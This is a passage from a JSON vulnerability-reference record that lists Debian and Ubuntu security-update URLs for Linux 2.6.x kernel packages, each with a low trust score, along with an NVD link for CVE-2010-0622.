        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-ia64_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0622"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390-tape_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-18-lpia_2.6.28-18.59_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-lpia_2.6.31-19.56_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304_2.6.31-304.10_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.31-19.56_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-k7_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-55.82_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.27_2.6.27-17.45_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-386_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpia_2.6.24-27.65_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-k7_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
